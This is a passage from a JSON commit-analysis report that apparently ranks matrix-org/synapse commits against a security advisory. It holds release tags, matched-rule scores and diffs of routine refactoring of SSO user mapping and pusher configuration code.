"v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8886, 8886", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8886", - "relevance": 2 - } - ] - }, - { - "commit_id": "c64002e1c1e95578528e96e3ae87738c4aea1d8a", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607604238, - "hunks": 10, - "message": "Refactor `SsoHandler.get_mxid_from_sso` (#8900) * Factor out _call_attribute_mapper and _register_mapped_user This is mostly an attempt to simplify `get_mxid_from_sso`. * Move mapping_lock down into SsoHandler.", - "diff": [ - "diff --git a/changelog.d/8900.feature b/changelog.d/8900.feature", - "new file mode 100644", - "index 000000000..d450ef499", - "--- /dev/null", - "+++ b/changelog.d/8900.feature", - "@@ -0,0 +1 @@", - "+Add support for allowing users to pick their own user ID during a single-sign-on login.", - "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", - "index 5846f0860..f2ca1ddb5 100644", - "--- a/synapse/handlers/saml_handler.py", - "+++ b/synapse/handlers/saml_handler.py", - "@@ -36,3 +36,2 @@ from synapse.types import (", - " )", - "-from synapse.util.async_helpers import Linearizer", - " from synapse.util.iterutils import chunk_seq", - "@@ -83,5 +82,2 @@ class SamlHandler(BaseHandler):", - "- # a lock on the mappings", - "- self._mapping_lock = Linearizer(name=\"saml_mapping\", clock=self.clock)", - "-", - " self._sso_handler = hs.get_sso_handler()", - "@@ -301,11 +297,10 @@ class SamlHandler(BaseHandler):", - "- with (await self._mapping_lock.queue(self._auth_provider_id)):", - "- return await self._sso_handler.get_mxid_from_sso(", - "- self._auth_provider_id,", - "- remote_user_id,", - "- user_agent,", - "- ip_address,", - "- saml_response_to_remapped_user_attributes,", - "- grandfather_existing_users,", - "- )", - "+ return await self._sso_handler.get_mxid_from_sso(", - "+ self._auth_provider_id,", - "+ remote_user_id,", - "+ user_agent,", - "+ ip_address,", - "+ saml_response_to_remapped_user_attributes,", - "+ grandfather_existing_users,", - "+ )", - "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", - "index e24767b92..112a7d5b2 100644", - "--- a/synapse/handlers/sso.py", - "+++ b/synapse/handlers/sso.py", - "@@ -24,2 +24,3 @@ from synapse.http.server import respond_with_html", - " from synapse.types import UserID, contains_invalid_mxid_characters", - "+from synapse.util.async_helpers import Linearizer", - "@@ -56,2 +57,5 @@ class SsoHandler:", - "+ # a lock on the mappings", - "+ self._mapping_lock = Linearizer(name=\"sso_user_mapping\", clock=hs.get_clock())", - "+", - " def render_error(", - "@@ -174,20 +178,34 @@ class SsoHandler:", - " \"\"\"", - "- # first of all, check if we already have a mapping for this user", - "- previously_registered_user_id = await self.get_sso_user_by_remote_user_id(", - "- auth_provider_id, remote_user_id,", - "- )", - "- if previously_registered_user_id:", - "- return previously_registered_user_id", - "-", - "- # Check for grandfathering of users.", - "- if grandfather_existing_users:", - "- previously_registered_user_id = await grandfather_existing_users()", - "+ # grab a lock while we try to find a mapping for this user. This seems...", - "+ # optimistic, especially for implementations that end up redirecting to", - "+ # interstitial pages.", - "+ with await self._mapping_lock.queue(auth_provider_id):", - "+ # first of all, check if we already have a mapping for this user", - "+ previously_registered_user_id = await self.get_sso_user_by_remote_user_id(", - "+ auth_provider_id, remote_user_id,", - "+ )", - " if previously_registered_user_id:", - "- # Future logins should also match this user ID.", - "- await self._store.record_user_external_id(", - "- auth_provider_id, remote_user_id, previously_registered_user_id", - "- )", - " return previously_registered_user_id", - "- # Otherwise, generate a new user.", - "+ # Check for grandfathering of users.", - "+ if grandfather_existing_users:", - "+ previously_registered_user_id = await grandfather_existing_users()", - "+ if previously_registered_user_id:", - "+ # Future logins should also match this user ID.", - "+ await self._store.record_user_external_id(", - "+ auth_provider_id, remote_user_id, previously_registered_user_id", - "+ )", - "+ return previously_registered_user_id", - "+", - "+ # Otherwise, generate a new user.", - "+ attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", - "+ user_id = await self._register_mapped_user(", - "+ attributes, auth_provider_id, remote_user_id, user_agent, ip_address,", - "+ )", - "+ return user_id", - "+", - "+ async def _call_attribute_mapper(", - "+ self, sso_to_matrix_id_mapper: Callable[[int], Awaitable[UserAttributes]],", - "+ ) -> UserAttributes:", - "+ \"\"\"Call the attribute mapper function in a loop, until we get a unique userid\"\"\"", - " for i in range(self._MAP_USERNAME_RETRIES):", - "@@ -229,3 +247,12 @@ class SsoHandler:", - " )", - "+ return attributes", - "+ async def _register_mapped_user(", - "+ self,", - "+ attributes: UserAttributes,", - "+ auth_provider_id: str,", - "+ remote_user_id: str,", - "+ user_agent: str,", - "+ ip_address: str,", - "+ ) -> str:", - " # Since the localpart is provided via a potentially untrusted module," - ], - "changed_files": [ - "changelog.d/8900.feature", - "synapse/handlers/saml_handler.py", - "synapse/handlers/sso.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8900": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8900, 8900", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8900", - "relevance": 2 - } - ] - }, - { - "commit_id": "bd30cfe86a5413191fe44d8f937a00117334ea82", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608135930, - "hunks": 108, - "message": "Convert internal pusher dicts to attrs classes. (#8940) This improves type hinting and should use less memory.", - "diff": [ - "diff --git a/changelog.d/8940.misc b/changelog.d/8940.misc", - "new file mode 100644", - "index 000000000..4ff0b94b9", - "--- /dev/null", - "+++ b/changelog.d/8940.misc", - "@@ -0,0 +1 @@", - "+Add type hints to push module.", - "diff --git a/mypy.ini b/mypy.ini", - "index 334e3a22f..190420402 100644", - "--- a/mypy.ini", - "+++ b/mypy.ini", - "@@ -67,2 +67,3 @@ files =", - " synapse/storage/databases/main/events.py,", - "+ synapse/storage/databases/main/pusher.py,", - " synapse/storage/databases/main/registration.py,", - "diff --git a/synapse/push/__init__.py b/synapse/push/__init__.py", - "index ad07ee86f..9e7ac149a 100644", - "--- a/synapse/push/__init__.py", - "+++ b/synapse/push/__init__.py", - "@@ -16,5 +16,7 @@", - " import abc", - "-from typing import TYPE_CHECKING, Any, Dict", - "+from typing import TYPE_CHECKING, Any, Dict, Optional", - "-from synapse.types import RoomStreamToken", - "+import attr", - "+", - "+from synapse.types import JsonDict, RoomStreamToken", - "@@ -24,4 +26,46 @@ if TYPE_CHECKING:", - "+@attr.s(slots=True)", - "+class PusherConfig:", - "+ \"\"\"Parameters necessary to configure a pusher.\"\"\"", - "+", - "+ id = attr.ib(type=Optional[str])", - "+ user_name = attr.ib(type=str)", - "+ access_token = attr.ib(type=Optional[int])", - "+ profile_tag = attr.ib(type=str)", - "+ kind = attr.ib(type=str)", - "+ app_id = attr.ib(type=str)", - "+ app_display_name = attr.ib(type=str)", - "+ device_display_name = attr.ib(type=str)", - "+ pushkey = attr.ib(type=str)", - "+ ts = attr.ib(type=int)", - "+ lang = attr.ib(type=Optional[str])", - "+ data = attr.ib(type=Optional[JsonDict])", - "+ last_stream_ordering = attr.ib(type=Optional[int])", - "+ last_success = attr.ib(type=Optional[int])", - "+ failing_since = attr.ib(type=Optional[int])", - "+", - "+ def as_dict(self) -> Dict[str, Any]:", - "+ \"\"\"Information that can be retrieved about a pusher after creation.\"\"\"", - "+ return {", - "+ \"app_display_name\": self.app_display_name,", - "+ \"app_id\": self.app_id,", - "+ \"data\": self.data,", - "+ \"device_display_name\": self.device_display_name,", - "+ \"kind\": self.kind,", - "+ \"lang\": self.lang,", - "+ \"profile_tag\": self.profile_tag,", - "+ \"pushkey\": self.pushkey,", - "+ }", - "+", - "+", - "+@attr.s(slots=True)", - "+class ThrottleParams:", - "+ \"\"\"Parameters for controlling the rate of sending pushes via email.\"\"\"", - "+", - "+ last_sent_ts = attr.ib(type=int)", - "+ throttle_ms = attr.ib(type=int)", - "+", - "+", - " class Pusher(metaclass=abc.ABCMeta):", - "- def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", - "+ def __init__(self, hs: \"HomeServer\", pusher_config: PusherConfig):", - " self.hs = hs", - "@@ -30,6 +74,8 @@ class Pusher(metaclass=abc.ABCMeta):", - "- self.pusher_id = pusherdict[\"id\"]", - "- self.user_id = pusherdict[\"user_name\"]", - "- self.app_id = pusherdict[\"app_id\"]", - "- self.pushkey = pusherdict[\"pushkey\"]", - "+ self.pusher_id = pusher_config.id", - "+ self.user_id = pusher_config.user_name", - "+ self.app_id = pusher_config.app_id", - "+ self.pushkey = pusher_config.pushkey", - "+", - "+ self.last_stream_ordering = pusher_config.last_stream_ordering", - "diff --git a/synapse/push/emailpusher.py b/synapse/push/emailpusher.py", - "index 11a97b8df..d2eff75a5 100644", - "--- a/synapse/push/emailpusher.py", - "+++ b/synapse/push/emailpusher.py", - "@@ -16,3 +16,3 @@", - " import logging", - "-from typing import TYPE_CHECKING, Any, Dict, List, Optional", - "+from typing import TYPE_CHECKING, Dict, List, Optional", - "@@ -22,3 +22,3 @@ from twisted.internet.error import AlreadyCalled, AlreadyCancelled", - " from synapse.metrics.background_process_metrics import run_as_background_process", - "-from synapse.push import Pusher", - "+from synapse.push import Pusher, PusherConfig, ThrottleParams", - " from synapse.push.mailer import Mailer", - "@@ -62,4 +62,4 @@ class EmailPusher(Pusher):", - "- def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any], mailer: Mailer):", - "- super().__init__(hs, pusherdict)", - "+ def __init__(self, hs: \"HomeServer\", pusher_config: PusherConfig, mailer: Mailer):", - "+ super().__init__(hs, pusher_config)", - " self.mailer = mailer", - "@@ -67,6 +67,5 @@ class EmailPusher(Pusher):", - " self.store = self.hs.get_datastore()", - "- self.email = pusherdict[\"pushkey\"]", - "- self.last_stream_ordering = pusherdict[\"last_stream_ordering\"]", - "+ self.email = pusher_config.pushkey", - " self.timed_call = None # type: Optional[DelayedCall]", - "- self.throttle_params = {} # type: Dict[str, Dict[str, int]]", - "+ self.throttle_params = {} # type: Dict[str, ThrottleParams]", - " self._inited = False", - "@@ -134,2 +133,3 @@ class EmailPusher(Pusher):", - " # this is our first loop: load up the throttle params", - "+ assert self.pusher_id is not None", - " self.throttle_params = await self.store.get_throttle_params_by_room(", - "@@ -159,2 +159,3 @@ class EmailPusher(Pusher):", - " start = 0 if INCLUDE_ALL_UNREAD_NOTIFS else self.last_stream_ordering", - "+ assert start is not None", - " unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_email(", - "@@ -246,3 +247,3 @@ class EmailPusher(Pusher):", - " if room_id in self.throttle_params:", - "- return self.throttle_params[room_id][\"throttle_ms\"]", - "+ return self.throttle_params[room_id].throttle_ms", - " else:", - "@@ -252,3 +253,3 @@ class EmailPusher(Pusher):", - " if room_id in self.throttle_params:", - "- return self.throttle_params[room_id][\"last_sent_ts\"]", - "+ return self.throttle_params[room_id].last_sent_ts", - " else:", - "@@ -303,6 +304,6 @@ class EmailPusher(Pusher):", - " )", - "- self.throttle_params[room_id] = {", - "- \"last_sent_ts\": self.clock.time_msec(),", - "- \"throttle_ms\": new_throttle_ms,", - "- }", - "+ self.throttle_params[room_id] = ThrottleParams(", - "+ self.clock.time_msec(), new_throttle_ms,", - "+ )", - "+ assert self.pusher_id is not None", - " await self.store.set_throttle_params(", - "diff --git a/synapse/push/httppusher.py b/synapse/push/httppusher.py", - "index e8b25bcd2..417fe0f1f 100644", - "--- a/synapse/push/httppusher.py", - "+++ b/synapse/push/httppusher.py", - "@@ -27,3 +27,3 @@ from synapse.logging import opentracing", - " from synapse.metrics.background_process_metrics import run_as_background_process", - "-from synapse.push import Pusher, PusherConfigException", - "+from synapse.push import Pusher, PusherConfig, PusherConfigException", - "@@ -64,12 +64,11 @@ class HttpPusher(Pusher):", - "- def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", - "- super().__init__(hs, pusherdict)", - "+ def __init__(self, hs: \"HomeServer\", pusher_config: PusherConfig):", - "+ super().__init__(hs, pusher_config)", - " self.storage = self.hs.get_storage()", - "- self.app_display_name = pusherdict[\"app_display_name\"]", - "- self.device_display_name = pusherdict[\"device_display_name\"]", - "- self.pushkey_ts = pusherdict[\"ts\"]", - "- self.data = pusherdict[\"data\"]", - "- self.last_stream_ordering = pusherdict[\"last_stream_ordering\"]", - "+ self.app_display_name = pusher_config.app_display_name", - "+ self.device_display_name = pusher_config.device_display_name", - "+ self.pushkey_ts = pusher_config.ts", - "+ self.data = pusher_config.data", - " self.backoff_delay = HttpPusher.INITIAL_BACKOFF_SEC", - "- self.failing_since = pusherdict[\"failing_since\"]", - "+ self.failing_since = pusher_config.failing_since", - " self.timed_call = None", - "@@ -78,15 +77,12 @@ class HttpPusher(Pusher):", - "- if \"data\" not in pusherdict:", - "- raise PusherConfigException(\"No 'data' key for HTTP pusher\")", - "- self.data = pusherdict[\"data\"]", - "+ self.data = pusher_config.data", - "+ if self.data is None:", - "+ raise PusherConfigException(\"'data' key can not be null for HTTP pusher\")", - " self.name = \"%s/%s/%s\" % (", - "- pusherdict[\"user_name\"],", - "- pusherdict[\"app_id\"],", - "- pusherdict[\"pushkey\"],", - "+ pusher_config.user_name,", - "+ pusher_config.app_id,", - "+ pusher_config.pushkey,", - " )", - "- if self.data is None:", - "- raise PusherConfigException(\"data can not be null for HTTP pusher\")", - "-", - " # Validate that there's a URL and it is of the proper form.", - "@@ -182,2 +178,3 @@ class HttpPusher(Pusher):", - " \"\"\"", - "+ assert self.last_stream_ordering is not None", - " unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_http(", - "@@ -210,2 +207,3 @@ class HttpPusher(Pusher):", - " self.last_stream_ordering = push_action[\"stream_ordering\"]", - "+ assert self.last_stream_ordering is not None", - " pusher_still_exists = await self.store.update_pusher_last_stream_ordering_and_success(", - "@@ -316,2 +314,4 @@ class HttpPusher(Pusher):", - "+ # This was checked in the __init__, but mypy doesn't seem to know that.", - "+ assert self.data is not None", - " if self.data.get(\"format\") == \"event_id_only\":", - "diff --git a/synapse/push/pusher.py b/synapse/push/pusher.py", - "index 8f1072b09..2aa7918fb 100644", - "--- a/synapse/push/pusher.py", - "+++ b/synapse/push/pusher.py", - "@@ -16,5 +16,5 @@", - " import logging", - "-from typing import TYPE_CHECKING, Any, Callable, Dict, Optional", - "+from typing import TYPE_CHECKING, Callable, Dict, Optional", - "-from synapse.push import Pusher", - "+from synapse.push import Pusher, PusherConfig", - " from synapse.push.emailpusher import EmailPusher", - "@@ -36,3 +36,3 @@ class PusherFactory:", - " \"http\": HttpPusher", - "- } # type: Dict[str, Callable[[HomeServer, dict], Pusher]]", - "+ } # type: Dict[str, Callable[[HomeServer, PusherConfig], Pusher]]", - "@@ -49,4 +49,4 @@ class PusherFactory:", - "- def create_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", - "- kind = pusherdict[\"kind\"]", - "+ def create_pusher(self, pusher_config: PusherConfig) -> Optional[Pusher]:", - "+ kind = pusher_config.kind", - " f = self.pusher_types.get(kind, None)", - "@@ -54,9 +54,9 @@ class PusherFactory:", - " return None", - "- logger.debug(\"creating %s pusher for %r\", kind, pusherdict)", - "- return f(self.hs, pusherdict)", - "+ logger.debug(\"creating %s pusher for %r\", kind, pusher_config)", - "+ return f(self.hs, pusher_config)", - " def _create_email_pusher(", - "- self, _hs: \"HomeServer\", pusherdict: Dict[str, Any]", - "+ self, _hs: \"HomeServer\", pusher_config: PusherConfig", - " ) -> EmailPusher:", - "- app_name = self._app_name_from_pusherdict(pusherdict)", - "+ app_name = self._app_name_from_pusherdict(pusher_config)", - " mailer = self.mailers.get(app_name)", - "@@ -70,6 +70,6 @@ class PusherFactory:", - " self.mailers[app_name] = mailer", - "- return EmailPusher(self.hs, pusherdict, mailer)", - "+ return EmailPusher(self.hs, pusher_config, mailer)", - "- def _app_name_from_pusherdict(self, pusherdict: Dict[str, Any]) -> str:", - "- data = pusherdict[\"data\"]", - "+ def _app_name_from_pusherdict(self, pusher_config: PusherConfig) -> str:", - "+ data = pusher_config.data", - "diff --git a/synapse/push/pusherpool.py b/synapse/push/pusherpool.py", - "index 9c12d81cf..8158356d4 100644", - "--- a/synapse/push/pusherpool.py", - "+++ b/synapse/push/pusherpool.py", - "@@ -17,3 +17,3 @@", - " import logging", - "-from typing import TYPE_CHECKING, Any, Dict, Optional", - "+from typing import TYPE_CHECKING, Dict, Iterable, Optional", - "@@ -25,5 +25,5 @@ from synapse.metrics.background_process_metrics import (", - " )", - "-from synapse.push import Pusher, PusherConfigException", - "+from synapse.push import Pusher, PusherConfig, PusherConfigException", - " from synapse.push.pusher import PusherFactory", - "-from synapse.types import RoomStreamToken", - "+from synapse.types import JsonDict, RoomStreamToken", - " from synapse.util.async_helpers import concurrently_execute", - "@@ -79,3 +79,3 @@ class PusherPool:", - "- def start(self):", - "+ def start(self) -> None:", - " \"\"\"Starts the pushers off in a background process.", - "@@ -89,12 +89,12 @@ class PusherPool:", - " self,", - "- user_id,", - "- access_token,", - "- kind,", - "- app_id,", - "- app_display_name,", - "- device_display_name,", - "- pushkey,", - "- lang,", - "- data,", - "- profile_tag=\"\",", - "+ user_id: str,", - "+ access_token: Optional[int],", - "+ kind: str,", - "+ app_id: str,", - "+ app_display_name: str,", - "+ device_display_name: str,", - "+ pushkey: str,", - "+ lang: Optional[str],", - "+ data: JsonDict,", - "+ profile_tag: str = \"\",", - " ) -> Optional[Pusher]:", - "@@ -113,17 +113,19 @@ class PusherPool:", - " self.pusher_factory.create_pusher(", - "- {", - "- \"id\": None,", - "- \"user_name\": user_id,", - "- \"kind\": kind,", - "- \"app_id\": app_id,", - "- \"app_display_name\": app_display_name,", - "- \"device_display_name\": device_display_name,", - "- \"pushkey\": pushkey,", - "- \"ts\": time_now_msec,", - "- \"lang\": lang,", - "- \"data\": data,", - "- \"last_stream_ordering\": None,", - "- \"last_success\": None,", - "- \"failing_since\": None,", - "- }", - "+ PusherConfig(", - "+ id=None,", - "+ user_name=user_id,", - "+ access_token=access_token,", - "+ profile_tag=profile_tag,", - "+ kind=kind,", - "+ app_id=app_id,", - "+ app_display_name=app_display_name,", - "+ device_display_name=device_display_name,", - "+ pushkey=pushkey,", - "+ ts=time_now_msec,", - "+ lang=lang,", - "+ data=data,", - "+ last_stream_ordering=None,", - "+ last_success=None,", - "+ failing_since=None,", - "+ )", - " )", - "@@ -153,7 +155,7 @@ class PusherPool:", - " async def remove_pushers_by_app_id_and_pushkey_not_user(", - "- self, app_id, pushkey, not_user_id", - "- ):", - "+ self, app_id: str, pushkey: str, not_user_id: str", - "+ ) -> None:", - " to_remove = await self.store.get_pushers_by_app_id_and_pushkey(app_id, pushkey)", - " for p in to_remove:", - "- if p[\"user_name\"] != not_user_id:", - "+ if p.user_name != not_user_id:", - " logger.info(", - "@@ -162,7 +164,9 @@ class PusherPool:", - " pushkey,", - "- p[\"user_name\"],", - "+ p.user_name,", - " )", - "- await self.remove_pusher(p[\"app_id\"], p[\"pushkey\"], p[\"user_name\"])", - "+ await self.remove_pusher(p.app_id, p.pushkey, p.user_name)", - "- async def remove_pushers_by_access_token(self, user_id, access_tokens):", - "+ async def remove_pushers_by_access_token(", - "+ self, user_id: str, access_tokens: Iterable[int]", - "+ ) -> None:", - " \"\"\"Remove the pushers for a given user corresponding to a set of", - "@@ -171,5 +175,4 @@ class PusherPool:", - " Args:", - "- user_id (str): user to remove pushers for", - "- access_tokens (Iterable[int]): access token *ids* to remove pushers", - "- for", - "+ user_id: user to remove pushers for", - "+ access_tokens: access token *ids* to remove pushers for", - " \"\"\"", - "@@ -180,12 +183,12 @@ class PusherPool:", - " for p in await self.store.get_pushers_by_user_id(user_id):", - "- if p[\"access_token\"] in tokens:", - "+ if p.access_token in tokens:", - " logger.info(", - " \"Removing pusher for app id %s, pushkey %s, user %s\",", - "- p[\"app_id\"],", - "- p[\"pushkey\"],", - "- p[\"user_name\"],", - "+ p.app_id,", - "+ p.pushkey,", - "+ p.user_name,", - " )", - "- await self.remove_pusher(p[\"app_id\"], p[\"pushkey\"], p[\"user_name\"])", - "+ await self.remove_pusher(p.app_id, p.pushkey, p.user_name)", - "- def on_new_notifications(self, max_token: RoomStreamToken):", - "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - " if not self.pushers:", - "@@ -208,3 +211,3 @@ class PusherPool:", - " @wrap_as_background_process(\"on_new_notifications\")", - "- async def _on_new_notifications(self, max_token: RoomStreamToken):", - "+ async def _on_new_notifications(self, max_token: RoomStreamToken) -> None:", - " # We just use the minimum stream ordering and ignore the vector clock", - "@@ -238,3 +241,5 @@ class PusherPool:", - "- async def on_new_receipts(self, min_stream_id, max_stream_id, affected_room_ids):", - "+ async def on_new_receipts(", - "+ self, min_stream_id: int, max_stream_id: int, affected_room_ids: Iterable[str]", - "+ ) -> None:", - " if not self.pushers:", - "@@ -282,10 +287,10 @@ class PusherPool:", - "- pusher_dict = None", - "+ pusher_config = None", - " for r in resultlist:", - "- if r[\"user_name\"] == user_id:", - "- pusher_dict = r", - "+ if r.user_name == user_id:", - "+ pusher_config = r", - " pusher = None", - "- if pusher_dict:", - "- pusher = await self._start_pusher(pusher_dict)", - "+ if pusher_config:", - "+ pusher = await self._start_pusher(pusher_config)", - "@@ -304,3 +309,3 @@ class PusherPool:", - "- async def _start_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", - "+ async def _start_pusher(self, pusher_config: PusherConfig) -> Optional[Pusher]:", - " \"\"\"Start the given pusher", - "@@ -308,3 +313,3 @@ class PusherPool:", - " Args:", - "- pusherdict: dict with the values pulled from the db table", - "+ pusher_config: The pusher configuration with the values pulled from the db table", - "@@ -314,3 +319,3 @@ class PusherPool:", - " if not self._pusher_shard_config.should_handle(", - "- self._instance_name, 